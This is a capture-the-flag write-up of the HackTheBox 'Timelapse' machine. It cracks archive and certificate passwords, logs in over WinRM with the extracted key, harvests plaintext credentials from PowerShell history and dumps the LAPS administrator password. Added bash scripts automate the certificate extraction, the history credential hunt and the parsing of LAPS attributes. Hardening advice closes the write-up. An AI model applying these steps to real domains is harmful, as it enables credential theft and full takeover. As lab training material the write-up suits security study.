Writeup - Timelapse (HTB)


This is a writeup for the Timelapse machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Many TCP ports are open. The two this writeup relies on are:

  • 445/tcp : SMB, used below to enumerate the shares
  • 5986/tcp : WinRM over HTTPS, used below for the remote shells


I start by listing the SMB shares with the guest account:

enum4linux -a -u "guest" -p ""

The Shares folder is available for reading, let's see what we can find in it:

We find two folders; in one of them there is a zip archive, which I download and try to unzip. Problem: it is password protected. Let's try to crack that password with john. I start by extracting a crackable hash from the archive with the following command:

zip2john > hash

Then I launch the dictionary attack with john with the rockyou dictionary:

Quickly I find that the password is supremelegacy, so I can now unpack the archive. Inside I find a file with the .pfx extension. These files are used by Windows to store a certificate together with its private key in PKCS#12 format, so from this file we can recover both the certificate and the private key. To do so, I use the following commands:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt

Problem: the PKCS#12 file is itself protected by a password, so openssl asks for an import password before it exports anything. I test the password found previously, but without success. Once again we have to brute-force the password with john. First I get the hash with the following command:

pfx2john legacyy_dev_auth.pfx > hashbis

Then I launch the dictionary attack with john:

I find the password thuglegacy and can now extract the private key and the certificate (adding -nodes to the first openssl command writes the key unencrypted, which spares a second passphrase prompt when evil-winrm loads it). I then try to connect to the machine using these two files for authentication, with evil-winrm and the following command:

evil-winrm -i -S -c cert.crt -k prv.key -p -u

I now have a shell with the legacyy user and I can get the first flag.

*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
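To show the PKCS#12 step end to end, here is an added example (not code from the writeup) that builds a throwaway password-protected .pfx with openssl, extracts the key and certificate the same way as above, checks that a wrong import password is rejected, and verifies that the extracted key really belongs to the certificate. The certificate subject, the file names and the reuse of the passphrase thuglegacy are assumptions for the demo; the script needs openssl and mktemp.

```shell
#!/usr/bin/env bash
# Added example (not from the writeup): PKCS#12 extraction with sanity checks.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Hypothetical test material: a throwaway self-signed cert packed into a .pfx
# with the passphrase "thuglegacy" (the one recovered with john in the writeup).
make_test_pfx() {
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj '/CN=legacyy' \
      -keyout "$WORK/orig.key" -out "$WORK/orig.crt" >/dev/null 2>&1 &&
  openssl pkcs12 -export -inkey "$WORK/orig.key" -in "$WORK/orig.crt" \
      -out "$WORK/legacyy_dev_auth.pfx" -passout pass:thuglegacy
}

# Extract key and cert. -nodes keeps the private key unencrypted so evil-winrm
# can load it without a second passphrase. Returns non-zero on a wrong password.
extract_pfx() {  # $1 = pfx, $2 = import password, $3 = out key, $4 = out cert
  openssl pkcs12 -in "$1" -passin "pass:$2" -nocerts -nodes -out "$3" 2>/dev/null &&
  openssl pkcs12 -in "$1" -passin "pass:$2" -clcerts -nokeys -out "$4" 2>/dev/null
}

# The public key derived from the private key must equal the one in the cert.
key_matches_cert() {  # $1 = key file, $2 = cert file
  [ "$(openssl pkey -in "$1" -pubout 2>/dev/null)" = \
    "$(openssl x509 -in "$2" -pubkey -noout 2>/dev/null)" ]
}

# Returns 0 when the wrong password is rejected, the right one works, and the
# extracted pair matches.
run_demo() {
  make_test_pfx || return 1
  local pfx="$WORK/legacyy_dev_auth.pfx"
  if extract_pfx "$pfx" supremelegacy "$WORK/bad.key" "$WORK/bad.crt"; then
    echo "wrong import password should have been rejected" >&2
    return 1
  fi
  extract_pfx "$pfx" thuglegacy "$WORK/prv.key" "$WORK/cert.crt" || return 1
  key_matches_cert "$WORK/prv.key" "$WORK/cert.crt" || return 1
  echo "key and certificate extracted and they match"
}

run_demo
```

Two caveats when doing this against a real capture: -nodes writes the private key in the clear, which is what you want when the key is fed to evil-winrm -k but means the file deserves the same handling as the .pfx; and a .pfx exported by older Windows versions may use RC2-40 for the certificate bag, which OpenSSL 3 only reads with the extra -legacy option on the pkcs12 commands.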

Privilege escalation

For the privilege escalation I start by uploading winPEAS, then I execute it:

powershell "Invoke-WebRequest -UseBasicParsing -OutFile winPEASx64.exe"

In the result of the program, I find that a file containing a command history exists on the machine:

I get it on my machine with the following command:

download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

The history file contains:

ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *

Looking at the contents of the file I find a user and his password!
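A quick hunt for the two patterns that gave away svc_deploy (a literal string passed to ConvertTo-SecureString -AsPlainText, and a literal user name in a PSCredential constructor), as an added example that is not part of the original writeup. The sample history and its values are constructed, and hunt_history_files assumes a copied-out or mounted Users tree that keeps the default PSReadLine path.

```shell
#!/usr/bin/env bash
# Added example: hunt PSReadLine history files for plaintext credentials.
# Sample content and names below are constructed, not taken from the box.
set -u

# Constructed history in the shape of the one found on the target.
SAMPLE_HISTORY=$(cat <<'EOF'
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Winter2024!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_backup', $p)
$s = Read-Host -AsSecureString
get-aduser -filter * -properties *
EOF
)

# Report literal secrets handed to ConvertTo-SecureString -AsPlainText and
# literal user names handed to the PSCredential constructor. Read-Host
# -AsSecureString is the non-leaking form and is deliberately not matched.
hunt_history() {  # $1 = history text
  printf '%s\n' "$1" | sed -nE \
    -e "s/.*ConvertTo-SecureString[[:space:]]+['\"]([^'\"]*)['\"][[:space:]]+-AsPlainText.*/secret: \1/p" \
    -e "s/.*PSCredential[[:space:]]*\([[:space:]]*['\"]([^'\"]*)['\"].*/user: \1/p"
  return 0
}

# Same hunt over every profile under a copied-out or mounted Users tree, at the
# default PSReadLine location (assumption: relocated profiles need another glob).
# Each hit is prefixed with the file it came from.
hunt_history_files() {  # $1 = directory holding the per-user profile folders
  local f rel
  for f in "$1"/*/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt; do
    [ -f "$f" ] || continue
    rel=${f#"$1"/}
    hunt_history "$(cat "$f")" | sed "s|^|$rel: |"
  done
  return 0
}

hunt_history "$SAMPLE_HISTORY"
```

The patterns are deliberately narrow: they only catch the explicit plaintext-to-SecureString idiom seen here. Credentials pasted into net use, runas or connection strings need their own expressions.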

Another thing winPEAS shows me is that the user svc_deploy has the right to read the LAPS password attribute!

The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.
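Legacy LAPS keeps that password in the ms-Mcs-AdmPwd attribute of the computer object, next to ms-Mcs-AdmPwdExpirationTime, which is what tools like LAPSDumper query over LDAP. As an added example (not the writeup's or LAPSDumper's code), here is what those attributes look like coming back from ldapsearch, with a small parser that pulls the password out of the LDIF (including the base64 form ldapsearch uses for values that are not LDIF-safe) and converts the expiration FILETIME to a Unix timestamp. The LDIF below is constructed: the host names, passwords and timestamp are made up, and the script assumes GNU base64 -d.

```shell
#!/usr/bin/env bash
# Added example: parse legacy LAPS attributes out of ldapsearch LDIF output.
# The attribute names are the real legacy LAPS ones; every value is made up.
set -u

# Constructed sample of what
#   ldapsearch -LLL -H ldap://<dc> -D svc_deploy@timelapse.htb -W \
#     -b DC=timelapse,DC=htb '(objectClass=computer)' ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
# returns to a principal allowed to read the attribute. WS01's value is shown
# base64-encoded ("::"), as ldapsearch does for values that are not LDIF-safe.
SAMPLE_LDIF='dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: Q7w#pL2m!vX9cZ
ms-Mcs-AdmPwdExpirationTime: 132944736000000000

dn: CN=WS01,CN=Computers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd:: OilaeTgjbU4=
ms-Mcs-AdmPwdExpirationTime: 132944736000000000
'

# Windows FILETIME (100 ns ticks since 1601-01-01) -> Unix epoch seconds.
filetime_to_epoch() {
  echo $(( $1 / 10000000 - 11644473600 ))
}

# Value of one "attr: value" or "attr:: base64value" LDIF line (no line folding).
ldif_value() {
  case $1 in
    *":: "*) printf '%s' "${1#*:: }" | base64 -d ;;
    *)       printf '%s' "${1#*: }" ;;
  esac
}

# Print "host<TAB>password<TAB>expiry-epoch" for every entry carrying a LAPS
# password. A trailing blank line is appended so the last entry is flushed too.
laps_passwords() {  # $1 = LDIF text
  local line host= passwd= exp=
  printf '%s\n\n' "$1" | while IFS= read -r line; do
    case $line in
      "dn: CN="*)                    host=${line#"dn: CN="}; host=${host%%,*} ;;
      ms-Mcs-AdmPwd:*)               passwd=$(ldif_value "$line") ;;
      ms-Mcs-AdmPwdExpirationTime:*) exp=$(filetime_to_epoch "$(ldif_value "$line")") ;;
      "")  # blank line closes the entry
        if [ -n "$host" ] && [ -n "$passwd" ]; then
          printf '%s\t%s\t%s\n' "$host" "$passwd" "$exp"
        fi
        host= passwd= exp= ;;
    esac
  done
  return 0
}

laps_passwords "$SAMPLE_LDIF"
```

The expiration time is worth keeping: a password that the parser reports as long expired usually means the LAPS client on that host is not running, so the value in AD may no longer be the one set locally. Windows LAPS (the newer built-in version) uses different attribute names (msLAPS-Password and friends), so this parser only covers the legacy schema the box uses.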

So I dump it with the LAPSDumper script, using the svc_deploy credentials:

python3 Windows/ -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb

The script finds the administrator password of the machine! I can now connect with the following command:

evil-winrm -i -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'

I now have a shell as Administrator and I can retrieve the last flag.

*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt


To harden this host I think the following actions would be necessary:

  • Do not allow SMB shares containing sensitive files to be read by unauthenticated (guest) users
  • Do not protect archives and certificate stores (.pfx) with weak, dictionary-guessable passwords
  • Do not leave plaintext credentials in files such as the PowerShell command history
  • Grant the right to read LAPS passwords only to the accounts that need it (here a deploy service account could read the Administrator password)
